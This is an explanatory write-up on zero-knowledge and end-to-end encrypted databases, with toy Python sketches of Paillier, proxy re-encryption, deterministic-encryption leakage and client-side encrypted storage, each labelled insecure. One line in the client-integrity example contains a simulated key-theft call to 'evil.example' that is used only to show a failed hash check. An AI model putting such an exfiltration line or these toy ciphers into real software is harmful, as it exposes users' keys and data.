franckverrot/Zero_knowledge_db.md

# Zero knowledge databases

## The idea

The idea is to provide a database as a service to end users in such a way that no one except the user herself can access the data, not even the hosting provider or the database administrator.

## Advantages


- A privacy- or security-conscious user will have more trust in such a setup.
- The service provider cannot be coerced into releasing the data it was entrusted with, and it cannot be held responsible for the content it stores.

## Problem


- With end-to-end encryption, all meaningful processing has to be done client-side.
- The server can basically only act as storage.
- Even as storage it is hampered: useful techniques such as de-duplication and compression do not work on encrypted data, because well-encrypted data looks like random bytes and (with randomized encryption) identical plaintexts encrypt to different ciphertexts.
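
A minimal sketch of why both techniques break. It uses a deliberately toy stream cipher, SHA-256 in counter mode behind a hypothetical `toy_encrypt` helper, as a stand-in for a real authenticated cipher such as AES-GCM; it is not secure and only illustrates the effect. Redundant plaintext compresses well, its ciphertext does not, and encrypting the same plaintext twice yields two different blobs that a server cannot de-duplicate.

```python
import hashlib
import os
import zlib


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy keystream: SHA-256(key || nonce || counter). NOT a vetted cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # A fresh random nonce per call makes the encryption randomized.
    nonce = os.urandom(16)
    ks = _keystream(key, nonce, len(plaintext))
    return nonce + bytes(p ^ k for p, k in zip(plaintext, ks))


key = os.urandom(32)
plaintext = b"the same row, over and over. " * 200

ciphertext_1 = toy_encrypt(key, plaintext)
ciphertext_2 = toy_encrypt(key, plaintext)

print("plaintext compressed: ", len(zlib.compress(plaintext)), "of", len(plaintext))
print("ciphertext compressed:", len(zlib.compress(ciphertext_1)), "of", len(ciphertext_1))
print("identical ciphertexts?", ciphertext_1 == ciphertext_2)
```

The plaintext shrinks to a small fraction of its size, while the ciphertext does not shrink at all. The two encryptions of the same data differ, so byte-level de-duplication finds nothing to share.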

## Exposed meta-data


Even to function as pure storage (and even more so if advanced functionality such as indexing and searching is provided), some meta-data has to be exposed to the service provider. Examples include file names, file types, and access permissions.

## Encryption in a relational database


For true zero-knowledge, end-to-end encryption, all data must be encrypted by the database client and sent to the database as ciphertext. As a result, the database can only store opaque blobs that it cannot operate on:

- no indexing
- no searches
- no calculations


- Encryption can be applied selectively, so that only the "sensitive data" is encrypted while other data remains in clear text.
- Some databases can encrypt and decrypt automatically on the server; for Postgres there is the pgcrypto module. For that to work, however, the keys need to be transmitted to the database (although they are not stored there).
  - Postgres encryption options: http://www.postgresql.org/docs/current/static/encryption-options.html
  - SQL Server 2016 implements client-side encryption at the driver level ("Always Encrypted" mode, see below).
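
A minimal sketch of selective client-side encryption, with Python's built-in `sqlite3` playing the untrusted server. The `city` column stays in clear text, so the database can index and filter it. `diagnosis` is encrypted by the client and is just an opaque blob to the server. The table, the column names, and the SHA-256 keystream cipher are hypothetical placeholders, not a real scheme; a real deployment would use a vetted cipher such as AES-GCM.

```python
import hashlib
import os
import sqlite3


def _keystream(key, nonce, length):
    # Toy keystream (SHA-256 in counter mode); placeholder for a real cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key, text):
    nonce = os.urandom(16)
    data = text.encode()
    return nonce + bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def decrypt(key, blob):
    nonce, body = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body)))).decode()


client_key = os.urandom(32)          # lives only on the client
db = sqlite3.connect(":memory:")     # plays the role of the untrusted server
db.execute("CREATE TABLE patients (city TEXT, diagnosis BLOB)")
db.execute("CREATE INDEX patients_city ON patients (city)")  # fine: clear text
for city, diagnosis in [("Lyon", "flu"), ("Paris", "asthma"), ("Lyon", "asthma")]:
    db.execute("INSERT INTO patients VALUES (?, ?)", (city, encrypt(client_key, diagnosis)))

# The server can filter on the clear-text column...
rows = db.execute("SELECT diagnosis FROM patients WHERE city = ?", ("Lyon",)).fetchall()
# ...but only the client can read the encrypted one.
lyon_diagnoses = sorted(decrypt(client_key, blob) for (blob,) in rows)

# A server-side search on the encrypted column finds nothing.
hits = db.execute("SELECT COUNT(*) FROM patients WHERE diagnosis = 'asthma'").fetchone()[0]
print(lyon_diagnoses, hits)  # ['asthma', 'flu'] 0
```
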

## Trusting the client software


Assuming end-to-end encryption is available, the user still has to trust the client software (not to steal her keys).

- Option 1: The user verifies the source code herself (impractical).
- Option 2: The user trusts the service provider to supply proper client software (does not solve the trust problem).
- Option 3: A trustworthy independent vendor provides the client software (this is how web browsers work; it probably requires a standard protocol to be viable).
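
Option 3 only helps if the user can check that the client she runs is the one the independent party vouched for. This is a minimal sketch under a hypothetical setup: an auditor publishes the SHA-256 digest of each approved client build. The user hashes the downloaded bundle and refuses to run it on a mismatch. The function name and bundle contents are illustrative.

```python
import hashlib
import hmac


def verify_client_bundle(bundle: bytes, published_sha256_hex: str) -> bool:
    # Hash the exact bytes that will be executed, not a copy fetched separately.
    actual = hashlib.sha256(bundle).hexdigest()
    # Constant-time comparison of the two hex digests.
    return hmac.compare_digest(actual, published_sha256_hex.lower())


approved_build = b"console.log('hypothetical client build 1.0');"
published = hashlib.sha256(approved_build).hexdigest()  # would come from the auditor

tampered_build = approved_build + b" sendKeysTo('evil.example');"
print(verify_client_bundle(approved_build, published))  # True
print(verify_client_bundle(tampered_build, published))  # False
```

This does not remove the need to trust someone. It moves that trust from the service provider to whoever publishes the digest, which is the point of option 3.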

## SaaS => not just the database


- In a SaaS setup, the service provider manages not just the database but the whole software stack, including the core application logic and very often also the user interface. In this case, encrypting just the database does not help with the trust issue at all. The user would want every component in the stack to be inoperative without her explicit consent.
- One way to implement this is to keep the processing logic in the application server, but have the user supply the decryption keys when she logs in. However, the user would then have to trust the server operator not to steal and store the keys.
- Moving decryption to the real client greatly reduces the appeal of SaaS: not much more than simple storage can be provided, and the client needs to be "thick" and hosted and controlled by the user (not just downloaded on the fly, because then it becomes untrustworthy).

## Degrees of security and trust


- There is no 100% secure solution anyway.
- Improved security is already worthwhile.
- There is a valid trade-off to be made between more security and more functionality/performance/convenience.
- To decide on appropriate levels of security, be clear about the threat scenario ("who is the attacker?").
- Privacy/security policies that cannot be enforced by technology can still be enforced by legislation or market forces (although one has to wonder whether most end users care enough).
  - For example, a publicly stated, independently verified, legally binding policy to encrypt all data at rest with a user-supplied key that is never stored seems like a good thing.

## Homomorphic encryption

- Homomorphic encryption is an encryption scheme whereby meaningful operations can be performed directly on encrypted data, producing encrypted results that only the owner of the data can decrypt. The entity performing the calculation gains no knowledge of the key, the data, or the result.
- This would allow calculations to be moved to an untrusted server.
- Unfortunately, fully homomorphic encryption is still very much a research effort and not (yet?) practical.
- However, some limited forms (for very specific calculations and/or leaking some information about the plaintext) are becoming available.
- https://en.wikipedia.org/wiki/Homomorphic_encryption
- http://www.zdnet.com/article/encryptions-holy-grail-is-getting-closer-one-way-or-another/
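
Paillier encryption is one of these limited (partially homomorphic) schemes. Multiplying two ciphertexts yields an encryption of the sum of the plaintexts. A minimal sketch follows, using toy-sized primes and the common simplification g = n + 1; real deployments use moduli of 2048 bits or more. It shows that a server can add values it cannot read.

```python
import math
import secrets

# Toy key material: two small, well-known primes. NOT secure, illustration only.
P, Q = 7919, 104729
N = P * Q
N_SQUARED = N * N
LAMBDA = (P - 1) * (Q - 1) // math.gcd(P - 1, Q - 1)  # lcm(p - 1, q - 1)
MU = pow(LAMBDA, -1, N)  # valid because we use g = n + 1


def encrypt(m: int) -> int:
    """Public-key operation: anyone knowing N can encrypt 0 <= m < N."""
    while True:
        r = secrets.randbelow(N - 1) + 1
        if math.gcd(r, N) == 1:
            break
    return (pow(N + 1, m, N_SQUARED) * pow(r, N, N_SQUARED)) % N_SQUARED


def decrypt(c: int) -> int:
    """Private-key operation: needs LAMBDA and MU."""
    x = pow(c, LAMBDA, N_SQUARED)
    return ((x - 1) // N) * MU % N


def add_encrypted(c1: int, c2: int) -> int:
    """Server side: E(a) * E(b) mod n^2 decrypts to a + b mod n."""
    return (c1 * c2) % N_SQUARED


def scale_encrypted(c: int, k: int) -> int:
    """Server side: E(a)^k mod n^2 decrypts to k * a mod n."""
    return pow(c, k, N_SQUARED)


salaries = [encrypt(4200), encrypt(3900), encrypt(5100)]
total = salaries[0]
for c in salaries[1:]:
    total = add_encrypted(total, c)  # the server never sees 4200, 3900 or 5100
print(decrypt(total))  # 13200
print(decrypt(scale_encrypted(encrypt(7), 6)))  # 42
```

Only addition (and multiplication by a known constant) is supported. Multiplying two encrypted values is not, which is exactly the "very specific calculations" limitation mentioned above.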

## Proxy re-encryption

- When sharing encrypted data with someone else, one has to either share the key or re-encrypt the plaintext with a new key (for the recipient). Both approaches need access to the original key.
- Proxy re-encryption schemes are a limited form of homomorphic encryption that allows a third party (the proxy) to transform a ciphertext intended for user A into a ciphertext intended for user B. This requires the cooperation of user A, but neither the secret keys nor the plaintext are exposed to the proxy.
- That way the proxy can forward encrypted messages on behalf of the original recipient.
- https://en.wikipedia.org/wiki/Proxy_re-encryption
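
This is a minimal sketch of the classic ElGamal-based proxy re-encryption scheme of Blaze, Bleumer and Strauss (BBS98), over a toy-sized group. The proxy holds only the re-encryption key rk = b/a. With it, the proxy turns Alice's ciphertext into one Bob can open, without seeing the message or either secret key. One caveat of this simple scheme: computing rk as written needs both secret keys (or an interactive protocol between A and B), and the resulting key works in both directions. Later, unidirectional schemes avoid this.

```python
import secrets

# Toy group: P = 2*Q + 1 is a safe prime and G generates the subgroup of
# prime order Q (the quadratic residues mod P). Far too small to be secure.
P, Q, G = 2039, 1019, 4


def keygen():
    sk = secrets.randbelow(Q - 1) + 1      # secret exponent in [1, Q-1]
    return sk, pow(G, sk, P)               # (sk, pk = g^sk)


def encrypt(pk, m):
    """Encrypt 1 <= m < P for the owner of pk: (m * g^k, pk^k)."""
    k = secrets.randbelow(Q - 1) + 1
    return (m * pow(G, k, P)) % P, pow(pk, k, P)


def rekey(sk_a, sk_b):
    """Re-encryption key b / a mod Q (requires A's cooperation)."""
    return (sk_b * pow(sk_a, -1, Q)) % Q


def reencrypt(rk, ciphertext):
    """Run by the proxy: turns g^(a*k) into g^(b*k); m stays hidden."""
    c1, c2 = ciphertext
    return c1, pow(c2, rk, P)


def decrypt(sk, ciphertext):
    c1, c2 = ciphertext
    g_k = pow(c2, pow(sk, -1, Q), P)       # (g^(sk*k))^(1/sk) = g^k
    return (c1 * pow(g_k, -1, P)) % P


alice_sk, alice_pk = keygen()
bob_sk, bob_pk = keygen()
ct_for_alice = encrypt(alice_pk, 1234)
ct_for_bob = reencrypt(rekey(alice_sk, bob_sk), ct_for_alice)
print(decrypt(alice_sk, ct_for_alice), decrypt(bob_sk, ct_for_bob))  # 1234 1234
```
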

## Some implementations

### CryptDB


It works by executing SQL queries over encrypted data using a collection of efficient SQL-aware encryption schemes. CryptDB can also chain encryption keys to user passwords, so that a data item can be decrypted only by using the password of one of the users with access to that data. As a result, a database administrator never gets access to decrypted data, and even if all servers are compromised, an adversary cannot decrypt the data of any user who is not logged in.
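
The key-chaining idea can be illustrated with a minimal sketch, assuming a much simplified model of what CryptDB does. Each data item is encrypted under a random data key. Each user with access stores a copy of that data key wrapped under a key derived from her password, using PBKDF2 from Python's standard library. The XOR-based wrapping is a toy stand-in for a real key-wrap algorithm such as AES key wrap, and `grant_access` and `unlock` are hypothetical names.

```python
import hashlib
import os
import secrets

ITERATIONS = 100_000  # work factor for password-based key derivation


def derive_kek(password: str, salt: bytes) -> bytes:
    # 32-byte key-encryption key derived from the user's password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def grant_access(data_key: bytes, password: str):
    """Wrap data_key for one user; only (salt, wrapped key) is stored server-side."""
    salt = os.urandom(16)
    kek = derive_kek(password, salt)
    return salt, bytes(a ^ b for a, b in zip(data_key, kek))  # toy wrap


def unlock(wrapped, password: str) -> bytes:
    """Recover the data key at login time; impossible without the password."""
    salt, blob = wrapped
    kek = derive_kek(password, salt)
    return bytes(a ^ b for a, b in zip(blob, kek))


data_key = secrets.token_bytes(32)  # would encrypt the actual data item
stored = {
    "alice": grant_access(data_key, "alice's passphrase"),
    "bob": grant_access(data_key, "bob's passphrase"),
}

print(unlock(stored["alice"], "alice's passphrase") == data_key)  # True
print(unlock(stored["bob"], "bob's passphrase") == data_key)      # True
print(unlock(stored["bob"], "wrong guess") == data_key)           # False
```

The server holds only salts and wrapped keys, so a stolen database does not reveal the data key without a password. This mirrors the claim that data of users who are not logged in stays safe, though offline guessing of weak passwords remains possible.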

- http://css.csail.mit.edu/cryptdb/
- The problem here is that the two techniques CryptDB uses to allow queries to be processed (deterministic encryption and order-preserving encryption) leak quite a bit of information about the stored data. CryptDB recommends using these modes only for data that is not really sensitive, which raises the question of why that data needs to be encrypted at all.
- http://arstechnica.com/information-technology/2015/09/researchers-respond-to-developers-accusation-that-they-used-crypto-wrong/
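
Deterministic encryption maps equal plaintexts to equal ciphertexts. That is precisely what lets the server answer equality queries, and it also hands the server the frequency distribution of the column. The minimal sketch below uses an HMAC tag as a stand-in for the deterministic ciphertext. HMAC is not decryptable, but it has the same equality-preserving property that matters here. The key and values are made up.

```python
import hashlib
import hmac
from collections import Counter

COLUMN_KEY = b"hypothetical per-column key"


def det_tag(value: str) -> str:
    # Same input + same key -> same output: equality survives "encryption".
    return hmac.new(COLUMN_KEY, value.encode(), hashlib.sha256).hexdigest()[:16]


diagnoses = ["flu", "flu", "asthma", "flu", "diabetes", "asthma", "flu"]
stored = [det_tag(d) for d in diagnoses]  # all the server ever sees

# Equality queries work: the client sends det_tag("flu"), the server matches it.
matches = sum(1 for s in stored if s == det_tag("flu"))

# But the server also learns the histogram without any key.
histogram = sorted(Counter(stored).values(), reverse=True)
print(matches, histogram)  # 4 [4, 2, 1]
```

Combined with public background knowledge (for example, which diagnosis is most common), such a histogram can be enough to recover the column by frequency analysis. Order-preserving encryption additionally leaks the ordering of the values.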

### Mylar


Mylar protects data confidentiality even when an attacker gets full access to servers. Mylar stores only encrypted data on the server, and decrypts data only in users' browsers. Simply encrypting each user's data with a user key does not suffice, and Mylar addresses three challenges in making this approach work. First, Mylar allows the server to perform keyword search over encrypted documents, even if the documents are encrypted with different keys. Second, Mylar allows users to share keys and data securely in the presence of an active adversary. Finally, Mylar ensures that client-side application code is authentic, even if the server is malicious.

http://css.csail.mit.edu/mylar/
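
Mylar's multi-key search scheme is considerably more involved, since it lets a single query match documents encrypted under different keys. The basic idea of keyword search over encrypted documents can still be sketched in its simplest, single-key form. The client attaches a keyed tag for each keyword, and the server matches tags without learning the words. This is not Mylar's construction; names and keys are hypothetical.

```python
import hashlib
import hmac

SEARCH_KEY = b"hypothetical client-side search key"


def keyword_tag(word: str) -> str:
    # Deterministic keyed tag; the server cannot compute it without SEARCH_KEY.
    return hmac.new(SEARCH_KEY, word.lower().encode(), hashlib.sha256).hexdigest()


def index_document(text: str) -> set:
    """Client side: tags uploaded next to the (separately encrypted) document."""
    return {keyword_tag(w) for w in text.split()}


# Server-side state: document id -> set of opaque tags.
server_index = {
    "doc1": index_document("quarterly budget draft"),
    "doc2": index_document("holiday budget plans"),
    "doc3": index_document("meeting notes"),
}


def server_search(token: str) -> list:
    """Server side: matches tags without learning the keyword."""
    return sorted(doc for doc, tags in server_index.items() if token in tags)


print(server_search(keyword_tag("budget")))  # ['doc1', 'doc2']
```

The server still learns which documents match each query (the access pattern), even though it never sees the keyword itself.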

### Encrypted BigQuery Client


ebq enables storing of private data in encrypted form on BigQuery while supporting a meaningful subset of the client query types that are currently supported by these tools, maintaining scalable performance, and keeping the client data and the content of the queries as hidden as possible from the server.

https://github.com/google/encrypted-bigquery-client/blob/master/tutorial.md

### SQL Server 2016 Always Encrypted


Always Encrypted makes encryption transparent to applications. An Always Encrypted-enabled driver installed on the client computer achieves this by automatically encrypting and decrypting sensitive data in the SQL Server client application. The driver encrypts the data in sensitive columns before passing the data to SQL Server, and automatically rewrites queries so that the semantics to the application are preserved. Similarly, the driver transparently decrypts data, stored in encrypted database columns, contained in query results.

https://msdn.microsoft.com/en-us/library/mt163865.aspx
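
A minimal sketch of the driver-level idea, with Python's `sqlite3` standing in for SQL Server. A hypothetical wrapper, `EncryptingClient` (not the real driver API), encrypts the parameter bound to the sensitive `ssn` column before it leaves the client and decrypts results on the way back. Equality lookups keep working because the value is encrypted deterministically, here with a toy SIV-style construction in which the nonce is an HMAC of the plaintext. Always Encrypted likewise offers a deterministic mode for columns that must support equality comparisons, with the leakage that implies.

```python
import hashlib
import hmac
import sqlite3


def _keystream(key, nonce, length):
    # Toy SHA-256 counter-mode keystream; placeholder for a real cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def det_encrypt(key, text):
    data = text.encode()
    # Synthetic IV derived from the plaintext: equal values -> equal ciphertexts.
    iv = hmac.new(key, data, hashlib.sha256).digest()[:16]
    return iv + bytes(a ^ b for a, b in zip(data, _keystream(key, iv, len(data))))


def det_decrypt(key, blob):
    iv, body = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, iv, len(body)))).decode()


class EncryptingClient:
    """Hypothetical client-side wrapper; the key never reaches the database."""

    def __init__(self, conn, key):
        self.conn, self.key = conn, key
        self.conn.execute("CREATE TABLE IF NOT EXISTS patients (name TEXT, ssn BLOB)")

    def insert_patient(self, name, ssn):
        self.conn.execute(
            "INSERT INTO patients (name, ssn) VALUES (?, ?)",
            (name, det_encrypt(self.key, ssn)),
        )

    def find_by_ssn(self, ssn):
        # The query text is unchanged; only the bound parameter is encrypted.
        rows = self.conn.execute(
            "SELECT name, ssn FROM patients WHERE ssn = ?",
            (det_encrypt(self.key, ssn),),
        ).fetchall()
        return [(name, det_decrypt(self.key, blob)) for name, blob in rows]


db = sqlite3.connect(":memory:")
client = EncryptingClient(db, key=b"hypothetical column encryption key")
client.insert_patient("Alice", "123-45-6789")
client.insert_patient("Bob", "987-65-4321")

print(client.find_by_ssn("123-45-6789"))  # [('Alice', '123-45-6789')]
print(db.execute("SELECT ssn FROM patients").fetchone()[0][:8])  # opaque bytes
```
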

### iMessage

- Apple's messaging service offers end-to-end encryption between all connected devices. Encryption and decryption happen on your devices using keys that never leave the secure storage area there; the iMessage servers only act as store-and-forward relays for ciphertext they cannot read, and as a directory service to look up recipients' public keys.
- However, you have to trust Apple to do as they say. Since they have complete control over both client and server software, they could have built in (or could build in the future) backdoors, for example to add lawful intercept capabilities.

### ZeroDB


In ZeroDB, the client is responsible for the database logic. Data encryption, decryption and compression also happen client side. Therefore, the server never has any knowledge about the data, its structure or order.

http://www.zerodb.io
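
When everything happens client-side, compression (which stops working once data is encrypted) can be applied before encryption instead. This minimal sketch assumes a hypothetical page store in which the server keeps only opaque blobs under random ids. It does not reproduce ZeroDB's actual storage format, and a toy SHA-256 keystream cipher stands in for real encryption.

```python
import hashlib
import os
import zlib


def _keystream(key, nonce, length):
    # Toy SHA-256 counter-mode keystream; placeholder for a real cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


class ClientSideStore:
    """Hypothetical client: compresses, then encrypts, then uploads."""

    def __init__(self, key):
        self.key = key
        self.server = {}  # stands in for the remote server: id -> opaque blob

    def put(self, record: bytes) -> str:
        compressed = zlib.compress(record)  # must happen before encryption
        nonce = os.urandom(16)
        ks = _keystream(self.key, nonce, len(compressed))
        page_id = os.urandom(8).hex()  # random id reveals nothing about content
        self.server[page_id] = nonce + bytes(a ^ b for a, b in zip(compressed, ks))
        return page_id

    def get(self, page_id: str) -> bytes:
        blob = self.server[page_id]
        nonce, body = blob[:16], blob[16:]
        ks = _keystream(self.key, nonce, len(body))
        return zlib.decompress(bytes(a ^ b for a, b in zip(body, ks)))


store = ClientSideStore(os.urandom(32))
record = b'{"name": "Alice", "tags": ["a", "a", "a"]}' * 50
page_id = store.put(record)
print(store.get(page_id) == record)              # True
print(len(store.server[page_id]) < len(record))  # True: compressed before encryption
```

Compressing before encrypting does leak information through ciphertext length. Attacks such as CRIME exploit this when attacker-controlled and secret data are compressed together.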

### 0bin - encrypted paste bin

0bin is a client-side encrypted online pastebin service.

- JavaScript in the browser creates a secret key for each file, and only the encrypted data is uploaded and stored. The secret key is part of the URL assigned to the file (in the "hash" fragment, which is not transmitted to the server). As a user, you must store that URL; otherwise the file becomes inaccessible. Sharing also works by sharing the URL.
- http://0bin.net/
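
The key-in-the-fragment trick can be sketched as follows. This assumes a hypothetical host, `https://paste.example`, and uses a toy keystream cipher in place of the browser-side encryption the real service performs. `urllib.parse.urlsplit` separates the parts a browser puts into the HTTP request (path and query) from the part that stays local (the fragment after `#`).

```python
import base64
import hashlib
import os
from urllib.parse import urlsplit


def _xor(key, nonce, data):
    # Toy SHA-256 counter-mode keystream XOR; placeholder for a real cipher.
    ks = bytearray()
    counter = 0
    while len(ks) < len(data):
        ks += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, ks))


SERVER_STORAGE = {}  # what the paste server holds: id -> ciphertext only


def create_paste(text: str) -> str:
    key = os.urandom(32)          # fresh key per paste, generated client-side
    nonce = os.urandom(16)
    paste_id = os.urandom(6).hex()
    SERVER_STORAGE[paste_id] = nonce + _xor(key, nonce, text.encode())  # "upload"
    fragment = base64.urlsafe_b64encode(key).decode().rstrip("=")
    return f"https://paste.example/paste/{paste_id}#{fragment}"


def open_paste(url: str) -> str:
    parts = urlsplit(url)
    # Only parts.path (and parts.query) would be sent to the server.
    paste_id = parts.path.rsplit("/", 1)[-1]
    blob = SERVER_STORAGE[paste_id]                       # "download"
    padded = parts.fragment + "=" * (-len(parts.fragment) % 4)
    key = base64.urlsafe_b64decode(padded)                # never left the client
    nonce, body = blob[:16], blob[16:]
    return _xor(key, nonce, body).decode()


url = create_paste("secret notes")
print(open_paste(url))  # secret notes
```

Losing the URL means losing the key, which is why the URL must be kept. Sharing the URL shares the key along with the location.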